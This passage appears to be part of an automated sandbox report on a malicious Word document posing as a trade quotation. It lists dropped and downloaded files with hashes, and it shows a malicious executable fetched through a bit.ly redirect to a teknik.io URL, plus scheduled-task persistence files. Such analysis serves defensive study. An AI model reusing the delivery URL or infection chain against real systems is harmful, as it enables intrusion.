                                                                                Preview: p...... ........b.......(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):252
                                                                                Entropy (8bit):3.0294634724686764
                                                                                Encrypted:false
                                                                                SSDEEP:3:kkFklA9M1fllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kK5QliBAIdQZV7eAYLit
                                                                                MD5:030E777529B43E0D9FED41EFFE564B26
                                                                                SHA1:80E57C39FC84DC03AFC464FF6E0E9D66239F1BD3
                                                                                SHA-256:88ABA1A4879A359E121690E3BBC990017F6C45ABBA1EB0FDAF3DFAAD07A5BE61
                                                                                SHA-512:75E8FEA934E26617B9E933794507CF9FA2ADD1AFF10000D35652F468742F4B4AE2B33A1447138A70BA9F9045F84C31E63E38D59CDAC4BB2B9C0C80FFEC12BB2C
                                                                                Malicious:false
                                                                                Preview: p...... ....`....SJ.....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:downloaded
                                                                                Size (bytes):131072
                                                                                Entropy (8bit):4.856871861209239
                                                                                Encrypted:false
                                                                                SSDEEP:3072:6wVUP1A3a64iOR/VfgmLQPDBZByQqFXrMQqwV:6wVUPH6GfgmLQPDBZByQqFXIQqwV
                                                                                MD5:A6AD1C3046A3CF0C6992507F2886AAB3
                                                                                SHA1:8024E4315C4BD196F1531E08C541359DBAC70A39
                                                                                SHA-256:CEF944407A26C3C148AFBF8253BAA55AEE7CDFAEC17B5A158831574245BAC8AD
                                                                                SHA-512:A5C0796BCCE3CEDE14CC02915A4A0A55AEEAFD0B0675AF8FE395905F9ED78A58CBDCED5EE89CFBDD7E55B90A5AED2D647C76EE3BB9DD35E778DA19680768F21A
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Virustotal, Detection: 42%, Browse
                                                                                • Antivirus: ReversingLabs, Detection: 28%
                                                                                IE Cache URL:https://u.teknik.io/wREzo.txt
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L.....Y.................P...................`....@.........................................................................tY..(....p.....................................................................(... ....................................text....M.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\2ZKf4aq[1].htm
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:HTML document, ASCII text
                                                                                Category:dropped
                                                                                Size (bytes):116
                                                                                Entropy (8bit):4.572661742712173
                                                                                Encrypted:false
                                                                                SSDEEP:3:qVvzLURODccZ/vXbvx9nDyZHL+E8IkFSXbKFvNGb:qFzLIeco3XLx92ZHqHIMSLWQb
                                                                                MD5:64D298FA5892D258CB4465CD14478454
                                                                                SHA1:0BBAEB8DBA81A7861C1AAFBAB629538937594658
                                                                                SHA-256:89007ADC49FABF9602747C7FA654CC9174D9FE25FD1CBF9DBA800329AAEBF36B
                                                                                SHA-512:C717A6A0C3811DC77B485D9D70159EE277970D213F456BC6F79FA0910E249BEC845E61CA24B6F48A73EEE15130743C27781A35610C945018BBC9B81BC9A1AC4A
                                                                                Malicious:false
                                                                                Preview: <html>.<head><title>Bitly</title></head>.<body><a href="https://u.teknik.io/wREzo.txt">moved here</a></body>.</html>
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0863C5D3-5908-4917-8F28-8909E0160183}.tmp
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1834894
                                                                                Entropy (8bit):4.020416000417094
                                                                                Encrypted:false
                                                                                SSDEEP:12288:DoINuEINuEINuEINuVINuEwNuEINueINuEINuEINuEINtEINuEINuEINuEINuEIX:k
                                                                                MD5:BCAEE394FB7661B22A808356CABD3615
                                                                                SHA1:E9252AC0D9998D3E8EAB95CF0153A29852A756A4
                                                                                SHA-256:1D0BF7198BD288E1276088B92D41C342A575DA7C2AB9085BF47A3A5C6843D175
                                                                                SHA-512:84EF925747D34DFEDFCE70B97A2FE525FBF5FD844B3368395FE9773E282AB561ACAA755D519ACE34A3CDDD402FD29B6696CCD161C6869573FB7BCF5A1AE1ACE6
                                                                                Malicious:false
                                                                                Preview: ..@.m.4.2.J.E.U.a.4.S.r.c.l.Z.j.j.E.@.-.K.I.2.W.T.Y.r.C.C.I.Y.w.a.u.Z.0.C.<.e.h.&.&.7._.M.-.C._.D.-.-._.-.V.,.6.4.>.8.8.9.6.4.$.C.v.>.y.t.=.n.6.|.:.%._.>.j.n.8.%.b.m.;.=.u...1.4..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . .
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24864F90-30CA-4646-ACFF-79FC9E14ADCB}.tmp
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1024
                                                                                Entropy (8bit):0.05390218305374581
                                                                                Encrypted:false
                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                Malicious:false
                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C2D3EB9C-AB70-4784-8852-5C03B64EE05D}.tmp
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1536
                                                                                Entropy (8bit):1.3568273340340575
                                                                                Encrypted:false
                                                                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbQ:IiiiiiiiiifdLloZQc8++lsJe1Mzb
                                                                                MD5:C990C02C26800951CBF8B0581C7AAC39
                                                                                SHA1:9768AA8776819BD7E836740634B596D46FFA8303
                                                                                SHA-256:0DDDB3264217F403F4D0D5791562DDA835E42E9592B1BCE42E6F1076F31F7AC3
                                                                                SHA-512:CC236BE11D2BAB46160A6AE3C01168B6B92A2DD5A77E027D561E00B5A5A617045008E975C6E54D73D3E6BFF5B7B499AFD560FDEFCA7B1FBCCBFB95436BE022B2
                                                                                Malicious:false
                                                                                Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\Local\Temp\CabBF0C.tmp
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                Category:dropped
                                                                                Size (bytes):59134
                                                                                Entropy (8bit):7.995450161616763
                                                                                Encrypted:true
                                                                                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                Malicious:false
                                                                                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                C:\Users\user\AppData\Local\Temp\TarBF0D.tmp
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):152788
                                                                                Entropy (8bit):6.316654432555028
                                                                                Encrypted:false
                                                                                SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                                MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                                SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                                SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                                SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                                Malicious:false
                                                                                Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                C:\Users\user\AppData\Local\Temp\tmp80F5.tmp
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1310
                                                                                Entropy (8bit):5.1063907901076036
                                                                                Encrypted:false
                                                                                SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
                                                                                MD5:CFAE5A3B7D8AA9653FE2512578A0D23A
                                                                                SHA1:A91A2F8DAEF114F89038925ADA6784646A0A5B12
                                                                                SHA-256:2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
                                                                                SHA-512:9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
                                                                                Malicious:false
                                                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                                C:\Users\user\AppData\Local\Temp\tmp9445.tmp
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1319
                                                                                Entropy (8bit):5.133606110275315
                                                                                Encrypted:false
                                                                                SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mne5xtn:cbk4oL600QydbQxIYODOLedq3Ze5j
                                                                                MD5:C6F0625BF4C1CDFB699980C9243D3B22
                                                                                SHA1:43DE1FE580576935516327F17B5DA0C656C72851
                                                                                SHA-256:8DFC4E937F0B2374E3CED25FCE344B0731CF44B8854625B318D50ECE2DA8F576
                                                                                SHA-512:9EF2DBD4142AD0E1E6006929376ECB8011E7FFC801EE2101E906787D70325AD82752DF65839DE9972391FA52E1E5974EC1A5C7465A88AA56257633EBB7D70969
                                                                                Malicious:true
                                                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):928
                                                                                Entropy (8bit):7.024371743172393
                                                                                Encrypted:false
                                                                                SSDEEP:24:IQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtw:Ik/lCrwfk/lCrwfk/lCrwfk/lCrw8
                                                                                MD5:CCB690520E68EE385ACC0ACFE759AFFC
                                                                                SHA1:33F0DA3F55E5B3C5AC19B61D31471CB60BCD5C96
                                                                                SHA-256:166154225DAB5FCB79C1CA97D371B159D37B83FBC0ADABCD8EBA98FA113A7A3B
                                                                                SHA-512:AC4F3CF1F8F460745D37E6350861C2FBCDDCC1BBDE0A48FB361BFBF5B1EBF10A05F798A72CE413FCA073FF8108955353DDBCBD9D50CED6CDAE231C67A28FDDA3
                                                                                Malicious:false
                                                                                Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                                                                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):8
                                                                                Entropy (8bit):3.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:xt:r
                                                                                MD5:3ABB7239389DBB84935EC98902664658
                                                                                SHA1:85EF47D1F243C052DA1C993B9A5F0D953AEB04EE
                                                                                SHA-256:C56B2DE67DFEBED5A8C2EAEC31498AD5E2AC6586A6C15EA6E82AB708FE8EBFC7
                                                                                SHA-512:BA77692928043D117C69ABCB3ADEE4F90E23AF8F30FEA996E3746F4971EEB030DBED26F535EEA1AF377E7DCB83911E977C0490C9C6923EC27BB025AD4B988FB6
                                                                                Malicious:true
                                                                                Preview: ..x....H
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.LNK
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Feb 25 14:28:30 2021, length=967360, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2568
                                                                                Entropy (8bit):4.577226214280601
                                                                                Encrypted:false
                                                                                SSDEEP:48:8QQY/XT3IkMbi1c42IQh2QQY/XT3IkMbi1c42IQ/:8QQY/XLIkMzpIQh2QQY/XLIkMzpIQ/
                                                                                MD5:2FF98281FD0929741EEB9C54BF54DB9B
                                                                                SHA1:C7F911DBA118EE784BB739A68E8F3798C8CB8A71
                                                                                SHA-256:7A1350716802EDF98667519C211D93E8B01CBA0016E0988EB36016D93F20F795
                                                                                SHA-512:5494D271B997819243119463B6DB88DC2F1D6E7EB9CD4F990B200116643DF201C6C39ADD17CA552C7A080F3617DE03CD28AED54293CDDC929C7929E3A6BE4E7E
                                                                                Malicious:false
                                                                                Preview: L..................F.... ...u....{..u....{..ym.............................;....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....YR.{ .QUOTAT~1.DOC..........Q.y.Q.y*...8.....................Q.U.O.T.A.T.I.O.N.s.4.4.8.8.8._.A.2.2.2.1._.T.O.A.N._.T.A.N._.L.O.C._.T.R.A.D.I.N.G._.S.E.R.V.I.C.E.S._.J.O.I.N.T._.S.T.O.C.K.s...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc.[.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.Q.U.O.T.A.T.I.O.N.s.4.4.8.8.8._.A.2.2.2.1._.T.O.A.N._.T.A.N._.L.O.C._.T.R.A.D.I.N.G._.S.E.R.V.I.C.E.S._.J.O.I.N.T._.S.T.O.C.K.s..
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):230
                                                                                Entropy (8bit):4.619567959906291
                                                                                Encrypted:false
                                                                                SSDEEP:6:M7qjk8A2zDKnKqjk8A2zDKjqjk8A2zDKs:Md87anY87aV87as
                                                                                MD5:8164887DD336F403637A7B7C1135A1DA
                                                                                SHA1:0D2E021E54D11E130E87026854D6D8367BC65052
                                                                                SHA-256:8617F63E83B01A5499DAB372DFB16503950187DFD4C82A4485F137476564F204
                                                                                SHA-512:9E8A0BCB48782714F3DE01F8482DB2B913DB7213334353C4A2B43B0B12AD5D56BEF8756A42746CA1537CFD56DEEE7A5ACCC1D56E22B8CE44A7DF0EE02D8F9AF6
                                                                                Malicious:false
                                                                                Preview: [doc]..QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.LNK=0..QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.LNK=0..[doc]..QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.LNK=0..
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):162
                                                                                Entropy (8bit):2.431160061181642
                                                                                Encrypted:false
                                                                                SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                Malicious:false
                                                                                Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):2
                                                                                Entropy (8bit):1.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:Qn:Qn
                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                Malicious:false
                                                                                Preview: ..
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\LIP8714C.txt
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:ASCII text
                                                                                Category:downloaded
                                                                                Size (bytes):64
                                                                                Entropy (8bit):4.030028124459133
                                                                                Encrypted:false
                                                                                SSDEEP:3:vpqMLJUQ2ciiZ/YXvWVt2X:vEMWXcijWVM
                                                                                MD5:25EDED50548FE4FFF3119179E391DD16
                                                                                SHA1:73D001FDD077A3066DB93CC0EF438BC51D2C20F0
                                                                                SHA-256:2CDCAB99426A62F6722A1704DE32D7B9BB8925A45B767D0934A1365A1578B1F1
                                                                                SHA-512:D85614C03EC7E9636E32AC05386752A76B2B330742DB6F6BC3A68EB566B94CE77ABA70E6A737E0EFAAADCE832289C4D623488DCA099765AF710ADA0077935300
                                                                                Malicious:false
                                                                                IE Cache URL:live.com/
                                                                                Preview: wla42..live.com/.1536.4124483072.30871743.3006855612.30870411.*.
                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Y5D8BEZV.txt
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:ASCII text
                                                                                Category:downloaded
                                                                                Size (bytes):89
                                                                                Entropy (8bit):4.3519817792342295
                                                                                Encrypted:false
                                                                                SSDEEP:3:jviOdjc3SQBI6LJci2JQdYVO2O2LGWTW3SVy2X:uOdg3SQI69ci2J53OyTXf
                                                                                MD5:BE6FA4005BF612690EEE1ECDD31EE976
                                                                                SHA1:883ACE9B58936BEE7163C278302FDD324127848A
                                                                                SHA-256:A05E2DC449119D274ED9B43B253ACD75E696BCE9AD895B8D8393B538560A28B1
                                                                                SHA-512:DC1C24E681E21D645F5CD3BE083F27DC4E4C9CC275BBD51A3D8B6205FC46EBD63DF0DC7857A16665BD82CFBF234DFBC56B48CCC57ABA89A59E7367D6F078584C
                                                                                Malicious:false
                                                                                IE Cache URL:bit.ly/
                                                                                Preview: _bit.l1p6te-b37a8979adaf075f5e-00T.bit.ly/.1536.1532647680.30906545.667713608.30870411.*.
                                                                                C:\Users\user\Desktop\~$OTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):162
                                                                                Entropy (8bit):2.431160061181642
                                                                                Encrypted:false
                                                                                SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                                                MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                                                SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                                                SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                                                SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                                                Malicious:false
                                                                                Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                                                C:\Users\user\subfolder1\filename1.exe
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):131072
